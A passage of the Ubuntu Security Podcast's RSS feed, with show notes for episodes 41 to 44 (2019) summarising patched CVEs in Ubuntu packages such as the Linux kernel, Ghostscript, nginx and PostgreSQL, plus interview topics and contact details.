<li><a href="https://ubuntu.com/security/CVE-2018-5785">CVE-2018-5785</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18088">CVE-2018-18088</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14423">CVE-2018-14423</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17480">CVE-2017-17480</a></li>
</ul>
</li>
<li>4 different DoS issues:
<ul>
<li>2 in BMP handling:
<ul>
<li>CPU based DoS due to inefficient algorithm implementation</li>
<li>Integer overflow -&gt; OOB read -&gt; DoS</li>
</ul>
</li>
<li>NULL pointer dereference when converting to PNM</li>
<li>Divide by zero</li>
</ul>
</li>
<li>Stack based buffer overflow when handling JP3D encoded data - OOB write -
DoS / RCE</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-webmin-backdoor-11-21">Joe and Alex discuss webmin backdoor [11:21]</h3>
<ul>
<li><a href="http://www.webmin.com/exploit.html">http://www.webmin.com/exploit.html</a></li>
</ul>
<h2 id="get-in-contact-21-45">Get in contact [21:45]</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E044.mp3" length="21558870" type="audio/mpeg" /><itunes:duration>22:27</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 43
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-43/</link>
          <pubDate>Wed, 21 Aug 2019 20:58:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>1415efd498db59ba97e4860b7a2eda77924ceaaed942127fa960ff48a6a5417668327be0327d27ec5271511fc63006be01000b872c0035213a4a09d03232622f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 43</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we cover vulnerabilities in Ghostscript, the Linux kernel, nginx and more, and we follow up last weeks interview with another interview with Jamie Strandboge, this time talking about the history of the Ubuntu Security team.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we cover vulnerabilities in Ghostscript, the Linux kernel, nginx and more, and we follow up last weeks interview with another interview with Jamie Strandboge, this time talking about the history of the Ubuntu Security team.</itunes:summary>
        <description>This week we cover vulnerabilities in Ghostscript, the Linux kernel, nginx and more, and we follow up last weeks interview with another interview with Jamie Strandboge, this time talking about the history of the Ubuntu Security team.</description>
        <googleplay:description>This week we cover vulnerabilities in Ghostscript, the Linux kernel, nginx and more, and we follow up last weeks interview with another interview with Jamie Strandboge, this time talking about the history of the Ubuntu Security team.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover vulnerabilities in Ghostscript, the Linux kernel, nginx and more, and we follow up last weeks interview with another interview with Jamie Strandboge, this time talking about the history of the Ubuntu Security team.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>53 unique CVEs addressed</p>
<h3 id="usn-4091-1-poppler-vulnerability">[<a href="https://usn.ubuntu.com/4091-1/">USN-4091-1</a>] poppler vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14494">CVE-2019-14494</a></li>
</ul>
</li>
<li>Divide by zero when texture surface specified with 0 length or width -
found via fuzzing - handled by checking first for zero-length and
returning an error -&gt; DoS</li>
</ul>
<h3 id="usn-4092-1-ghostscript-vulnerability">[<a href="https://usn.ubuntu.com/4092-1/">USN-4092-1</a>] Ghostscript vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10216">CVE-2019-10216</a></li>
</ul>
</li>
<li>Yet another Ghostscript -dSAFER sandbox bypass - <a href="https://ubuntusecuritypodcast.org/episode-31/">Episode 31</a>, <a href="https://ubuntusecuritypodcast.org/episode-25/">Episode 25</a>,
<a href="https://ubuntusecuritypodcast.org/episode-18/">Episode 18</a>, <a href="https://ubuntusecuritypodcast.org/episode-14/">Episode 14</a>, <a href="https://ubuntusecuritypodcast.org/episode-10/">Episode 10</a>, <a href="https://ubuntusecuritypodcast.org/episode-7/">Episode 7</a>, <a href="https://ubuntusecuritypodcast.org/episode-5/">Episode 5</a></li>
<li>Allows to escape the sandbox and use the various Ghostscript APIs for
arbitrary file access / modification etc.
<ul>
<li>Related: ImageMagick policy update <a href="https://ubuntusecuritypodcast.org/episode-38/">Episode 38</a></li>
</ul>
</li>
</ul>
<h3 id="usn-4070-2-usn-4070-3-mariadb-vulnerabilities">[<a href="https://usn.ubuntu.com/4070-2/">USN-4070-2</a>, <a href="https://usn.ubuntu.com/4070-3/">USN-4070-3</a>] MariaDB vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic and Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2805">CVE-2019-2805</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2740">CVE-2019-2740</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2739">CVE-2019-2739</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2737">CVE-2019-2737</a></li>
</ul>
</li>
<li>4 CVEs addressed in Disco only
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2614">CVE-2019-2614</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2627">CVE-2019-2627</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2628">CVE-2019-2628</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2758">CVE-2019-2758</a></li>
</ul>
</li>
<li>Covered some for MySQL in <a href="https://ubuntusecuritypodcast.org/episode-41/">Episode 41</a></li>
</ul>
<h3 id="usn-4093-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4093-1/">USN-4093-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Bionic (HWE), Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3846">CVE-2019-3846</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13272">CVE-2019-13272</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13233">CVE-2019-13233</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12984">CVE-2019-12984</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12614">CVE-2019-12614</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1125">CVE-2019-1125</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10126">CVE-2019-10126</a></li>
</ul>
</li>
<li>Latest speculative execution side-channel attack - SWAPGS
<ul>
<li><a href="https://www.bitdefender.com/business/swapgs-attack.html">https://www.bitdefender.com/business/swapgs-attack.html</a></li>
<li>Userspace can speculatively execute SWAPGS, allowing it to potentially
read kernel memory by speculatively swapping out userspace for kernel
memory - requires an appropriate gadget in the kernel</li>
<li>Linux not believed to be affected, since no appropriate gadget is
available, however we have proactively included the upstream fix which
is to add LFENCE calls around SWAPGS to ensure SWAPGS occurs before any
subsequent memory reads to / from userspace</li>
</ul>
</li>
<li>2 different memory corruption issues in the Marvell Wifi driver -
wouldn&rsquo;t do bounds checking on structures passed to it from user-space -
could allow DoS via crash or RCE</li>
<li>NULL ptr dereferences:
<ul>
<li>NFC subsystem, able to be triggered from userspace (using netlink)</li>
<li>PowerPC specific - could occur on memory allocation failures (failed to
check NULL return value)</li>
</ul>
</li>
<li>2 by Jann Horn:
<ul>
<li>ptrace would record process credentials incorrectly, so that a local user
can escalate to root in scenarios where a parent process drops privileges
and then calls execve of an attacker controlled application</li>
<li>UAF in handling of local descriptor table entries</li>
</ul>
</li>
</ul>
<h3 id="usn-4094-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4094-1/">USN-4094-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>32 CVEs addressed in Xenial (HWE), Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20511">CVE-2018-20511</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3846">CVE-2019-3846</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2101">CVE-2019-2101</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2024">CVE-2019-2024</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13272">CVE-2019-13272</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13233">CVE-2019-13233</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12984">CVE-2019-12984</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12819">CVE-2019-12819</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12818">CVE-2019-12818</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12614">CVE-2019-12614</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1125">CVE-2019-1125</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10126">CVE-2019-10126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5383">CVE-2018-5383</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20856">CVE-2018-20856</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20169">CVE-2018-20169</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16862">CVE-2018-16862</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14617">CVE-2018-14617</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14609">CVE-2018-14609</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14613">CVE-2018-14613</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14612">CVE-2018-14612</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14611">CVE-2018-14611</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14610">CVE-2018-14610</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14615">CVE-2018-14615</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13098">CVE-2018-13098</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13096">CVE-2018-13096</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14616">CVE-2018-14616</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14614">CVE-2018-14614</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13100">CVE-2018-13100</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13099">CVE-2018-13099</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13097">CVE-2018-13097</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13093">CVE-2018-13093</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13053">CVE-2018-13053</a></li>
</ul>
</li>
<li>Includes all from above, plus a heap of others - most interesting ones:
<ul>
<li>Heaps of DoS via NULL dereference / divide by zero / invalid read when dealing with
crafted file-system images (XFS, Ext4, F2FS, etc)</li>
<li>Bluetooth crypto may not validate ECC parameters, allowing an attacker
to force a weak key and snoop on communications as a result</li>
</ul>
</li>
</ul>
<h3 id="usn-4095-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4095-1/">USN-4095-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9503">CVE-2019-9503</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3846">CVE-2019-3846</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13272">CVE-2019-13272</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12614">CVE-2019-12614</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11599">CVE-2019-11599</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1125">CVE-2019-1125</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10126">CVE-2019-10126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5383">CVE-2018-5383</a></li>
</ul>
</li>
<li>Marvell Wifi, ptrace, PowerPC, SWAPGS and Bluetooth ECC parameter
validation mentioned above</li>
<li>Core dump race-condition (<a href="https://ubuntusecuritypodcast.org/episode-41/">Episode 41</a>)</li>
</ul>
<h3 id="usn-4095-2-linux-kernel--xenial-hwe--vulnerabilities">[<a href="https://usn.ubuntu.com/4095-2/">USN-4095-2</a>] Linux kernel (Xenial HWE) vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3846">CVE-2019-3846</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2054">CVE-2019-2054</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12614">CVE-2019-12614</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11833">CVE-2019-11833</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1125">CVE-2019-1125</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10126">CVE-2019-10126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5383">CVE-2018-5383</a></li>
</ul>
</li>
<li>Marvell, PowerPC, SWAPGS, Bluetooth</li>
<li>seccomp race, ext4 extents (<a href="https://ubuntusecuritypodcast.org/episode-41/">Episode 41</a>)</li>
</ul>
<h3 id="usn-4096-1-linux-kernel--aws--vulnerability">[<a href="https://usn.ubuntu.com/4096-1/">USN-4096-1</a>] Linux kernel (AWS) vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1125">CVE-2019-1125</a></li>
</ul>
</li>
<li>SWAPGS</li>
</ul>
<h3 id="usn-4097-1-usn-4097-2-php-vulnerabilities">[<a href="https://usn.ubuntu.com/4097-1/">USN-4097-1</a>, <a href="https://usn.ubuntu.com/4097-2/">USN-4097-2</a>] PHP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11042">CVE-2019-11042</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11041">CVE-2019-11041</a></li>
</ul>
</li>
<li>PHP EXIF parser would read past enf of supplied data - OOB read - crash -&gt; DoS</li>
</ul>
<h3 id="usn-4098-1-wpa-supplicant-and-hostapd-vulnerability">[<a href="https://usn.ubuntu.com/4098-1/">USN-4098-1</a>] wpa_supplicant and hostapd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13377">CVE-2019-13377</a></li>
</ul>
</li>
<li>Side-channel attack when using brainpool curves for ECC in WPA3 - observe
timing differences between various operations over long enough time to
infer the resulting encryption key - hard to achieve same level of
side-channel robustness as other ECC groups - recommended to disable
Brainpool curves in the context of SAE and EAP-pwd -
<a href="https://w1.fi/security/2019-6/sae-eap-pwd-side-channel-attack-update.txt">https://w1.fi/security/2019-6/sae-eap-pwd-side-channel-attack-update.txt</a></li>
</ul>
<h3 id="usn-4099-1-nginx-vulnerabilities">[<a href="https://usn.ubuntu.com/4099-1/">USN-4099-1</a>] nginx vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9516">CVE-2019-9516</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9513">CVE-2019-9513</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9511">CVE-2019-9511</a></li>
</ul>
</li>
<li>HTTP/2 DoS attacks
<ul>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/http2">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/http2</a></li>
<li>8 different vulnerabilities affecting a variety of HTTP/2
implementations - disovered mainly by Netflix:
<a href="https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md">https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md</a></li>
<li>3 affect nginx
<ul>
<li>0 length header</li>
<li>resource loop</li>
<li>data dribble</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4101-1-firefox-vulnerability">[<a href="https://usn.ubuntu.com/4101-1/">USN-4101-1</a>] Firefox vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11733">CVE-2019-11733</a></li>
</ul>
</li>
<li>Upstream 68.0.2 release</li>
<li>Able to copy passwords from the Saved Logins dialog without entering
Master Password - allows a local user with physical access to obtain
passwords etc</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="history-of-ubuntu-security-with-jamie-strandboge-and-joe-mcmanus">History of Ubuntu Security with Jamie Strandboge and Joe McManus</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E043.mp3" length="25284558" type="audio/mpeg" /><itunes:duration>26:20</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 42
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-42/</link>
          <pubDate>Wed, 14 Aug 2019 21:13:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>8d026811c700eb17a35225aad802fabfb76a5f89e860868d40a8e1148b55954acdd5ed0768b1b7d855d7e4be63edf5b0c20c051adcd335e36c12f67eaa7181a8</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 42</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we have a special interview with Ubuntu Security Team member
  Jamie Strandboge, talking about security aspects of the Snap packaging
  system, as well as the usual roundup of security fixes from the past week.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we have a special interview with Ubuntu Security Team member
  Jamie Strandboge, talking about security aspects of the Snap packaging
  system, as well as the usual roundup of security fixes from the past week.
  </itunes:summary>
        <description>  This week we have a special interview with Ubuntu Security Team member
  Jamie Strandboge, talking about security aspects of the Snap packaging
  system, as well as the usual roundup of security fixes from the past week.
  </description>
        <googleplay:description>  This week we have a special interview with Ubuntu Security Team member
  Jamie Strandboge, talking about security aspects of the Snap packaging
  system, as well as the usual roundup of security fixes from the past week.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we have a special interview with Ubuntu Security Team member
Jamie Strandboge, talking about security aspects of the Snap packaging
system, as well as the usual roundup of security fixes from the past week.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>7 unique CVEs addressed</p>
<h3 id="usn-4058-2-bash-vulnerability">[<a href="https://usn.ubuntu.com/4058-2/">USN-4058-2</a>] Bash vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9924">CVE-2019-9924</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-40/">Episode 40</a> (rbash, BASH_CMDS)</li>
</ul>
<h3 id="usn-4049-3-usn-4049-4-glib-regression">[<a href="https://usn.ubuntu.com/4049-3/">USN-4049-3</a>, <a href="https://usn.ubuntu.com/4049-4/">USN-4049-4</a>] GLib regression</h3>
<ul>
<li>Affecting Precise ESM, Trusty ESM, Xenial</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-40/">Episode 40</a> - previous update introduced a memory leak due to backport
using different API which didn&rsquo;t just return a const string but allocated
it and returned it but was not freed
<ul>
<li><a href="https://bugs.launchpad.net/ubuntu/+source/glib2.0/+bug/1838890">https://bugs.launchpad.net/ubuntu/+source/glib2.0/+bug/1838890</a></li>
</ul>
</li>
</ul>
<h3 id="usn-4086-1-mercurial-vulnerability">[<a href="https://usn.ubuntu.com/4086-1/">USN-4086-1</a>] Mercurial vulnerability</h3>
<ul>
<li>1 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3902">CVE-2019-3902</a></li>
</ul>
</li>
<li>Able to write to files outside of the repository by using a combination of symlinks and subrepositories
<ul>
<li>Can be mitigated either by disabling support for subrepositories in
your local configuration or by ensuring any cloned repos don&rsquo;t contain
malicious symlinks &hellip;</li>
</ul>
</li>
</ul>
<h3 id="usn-4087-1-bwa-vulnerability">[<a href="https://usn.ubuntu.com/4087-1/">USN-4087-1</a>] BWA vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10269">CVE-2019-10269</a></li>
</ul>
</li>
<li>Genome sequencing - maps DNA sequences against large reference genome (aka human genome mapping)</li>
<li>Takes input from .alt file - contains a name for the DNS sequence - which
is read into a fixed sized buffer - stack buffer overflow if name too
long (code even had a note - <a href="https://github.com/lh3/bwa/commit/20d0a13092aa4cb73230492b05f9697d5ef0b88e#diff-4b41da18d8e305ac5b0bea6db815bc20L200">FIXME segfault here</a>)</li>
</ul>
<h3 id="usn-4088-1-php-vulnerability">[<a href="https://usn.ubuntu.com/4088-1/">USN-4088-1</a>] PHP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13224">CVE-2019-13224</a></li>
</ul>
</li>
<li>Use-after-free in the embedded oniguruma regular expression library if
regular expression was multi-byte but input string was not (or
vice-versa) - fix to disallow processing if either is not the same as the
other</li>
</ul>
<h3 id="usn-4089-1-rack-vulnerability">[<a href="https://usn.ubuntu.com/4089-1/">USN-4089-1</a>] Rack vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16471">CVE-2018-16471</a></li>
</ul>
</li>
<li>XSS in Ruby webserver interface (used as middleware for writing Ruby web
application)</li>
</ul>
<h3 id="usn-4090-1-postgresql-vulnerabilities">[<a href="https://usn.ubuntu.com/4090-1/">USN-4090-1</a>] PostgreSQL vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10209">CVE-2019-10209</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10208">CVE-2019-10208</a></li>
</ul>
</li>
<li>Disco only - if a database contained super-user defined hash-equality
operators, could allow attacker to read arbitrary server memory</li>
<li>If a function was declared as &ldquo;SECURITY DEFINER&rdquo; an attacker could
execute arbitrary SQL as the identity of the function owner - needs
EXECUTE permission on the function and then requires the function itself
to have inexact argument type matching otherwise will be disallowed.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="discussion-with-joe-mcmanus-on-capital-one-breach-and-special-guest-jamie-strandboge-on-snaps-and-security">Discussion with Joe McManus on Capital One breach and special guest Jamie Strandboge on snaps and security</h3>
<ul>
<li><a href="https://www.zdnet.com/article/100-million-americans-and-6-million-canadians-caught-up-in-capital-one-breach/">https://www.zdnet.com/article/100-million-americans-and-6-million-canadians-caught-up-in-capital-one-breach/</a></li>
<li><a href="https://snapcraft.io">https://snapcraft.io</a></li>
<li><a href="https://forum.snapcraft.io/t/security-policy-and-sandboxing/554">https://forum.snapcraft.io/t/security-policy-and-sandboxing/554</a></li>
<li><a href="https://assets.ubuntu.com/v1/66fcd858-ubuntu-core-security-whitepaper.pdf">https://assets.ubuntu.com/v1/66fcd858-ubuntu-core-security-whitepaper.pdf</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E042.mp3" length="20441247" type="audio/mpeg" /><itunes:duration>21:17</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 41
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-41/</link>
          <pubDate>Mon, 05 Aug 2019 20:15:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>93da5c5539f3f81eac1a3b8ed45073abf86bc2e0b571557bbe3f86ba69d0444b12c536661c741547f3bfd212c198e83734b002caea5ee420146fbde697398a9a</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 41</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        With Alex and Joe having been away at a Canonical sprint last week, we look back at the past fortnight's security updates including new Linux kernel releases, MySQL, VLC, Django and more plus we discuss a recent Citrix password spraying...
        
        ]]></itunes:subtitle>
        <itunes:summary>With Alex and Joe having been away at a Canonical sprint last week, we look back at the past fortnight's security updates including new Linux kernel releases, MySQL, VLC, Django and more plus we discuss a recent Citrix password spraying attack.</itunes:summary>
        <description>With Alex and Joe having been away at a Canonical sprint last week, we look back at the past fortnight's security updates including new Linux kernel releases, MySQL, VLC, Django and more plus we discuss a recent Citrix password spraying attack.</description>
        <googleplay:description>With Alex and Joe having been away at a Canonical sprint last week, we look back at the past fortnight's security updates including new Linux kernel releases, MySQL, VLC, Django and more plus we discuss a recent Citrix password spraying attack.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>With Alex and Joe having been away at a Canonical sprint last week, we look back at the past fortnight&rsquo;s security updates including new Linux kernel releases, MySQL, VLC, Django and more plus we discuss a recent Citrix password spraying attack.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>90 unique CVEs addressed</p>
<h3 id="usn-4066-2-clamav-vulnerability">[<a href="https://usn.ubuntu.com/4066-2/">USN-4066-2</a>] ClamAV vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1010305">CVE-2019-1010305</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-40/">Episode 40</a> - libmspack buffer overflow - ClamAV contains own copy of
libmspack in older releases so is affected</li>
</ul>
<h3 id="usn-4065-2-squid-vulnerabilities">[<a href="https://usn.ubuntu.com/4065-2/">USN-4065-2</a>] Squid vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12529">CVE-2019-12529</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12525">CVE-2019-12525</a></li>
</ul>
</li>
</ul>
<p><a href="https://ubuntusecuritypodcast.org/episode-40/">Episode 40</a> (memory corruption issues)</p>
<h3 id="usn-4067-1-evince-vulnerability">[<a href="https://usn.ubuntu.com/4067-1/">USN-4067-1</a>] Evince vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1010006">CVE-2019-1010006</a></li>
</ul>
</li>
<li>Integer overflow -&gt; buffer overflow when handling embedded tiff content in PDF documents</li>
<li>DoS -&gt; possible RCE</li>
</ul>
<h3 id="usn-4068-1-usn-4068-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4068-1/">USN-4068-1</a>, <a href="https://usn.ubuntu.com/4068-2/">USN-4068-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic and Xenial (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11884">CVE-2019-11884</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11833">CVE-2019-11833</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11815">CVE-2019-11815</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11085">CVE-2019-11085</a></li>
</ul>
</li>
<li>2 information disclosure vulnerabilities:
<ul>
<li>Exposes kernel memory to user-space which could expose sensitive
information (keys, pointers to help defeat ASLR etc)</li>
<li>Bluetooth Human Interface Device Protocol (HIDP) socket ioctl() failed
to NUL terminate the name field</li>
<li>Ext4 file-system did not zero out unused regions in extents tree blocks
which are returned to user-space</li>
</ul>
</li>
<li>Use-after-free due to a race-condition in the reliable datagram socket
(RDS) protocol module -&gt; crash / code exec
<ul>
<li>Blacklisted by default in Ubuntu and contrary to the original CVE
description, this is not likely to be remotely exploitable since the
use-after-free only occurs on namespace cleanup</li>
</ul>
</li>
<li>Intel i915 graphics driver failed to validate ranges for mmap() in some places
<ul>
<li>Local attacker who already has access to the device could use this to
crash / code execution -&gt; privilege escalation</li>
</ul>
</li>
</ul>
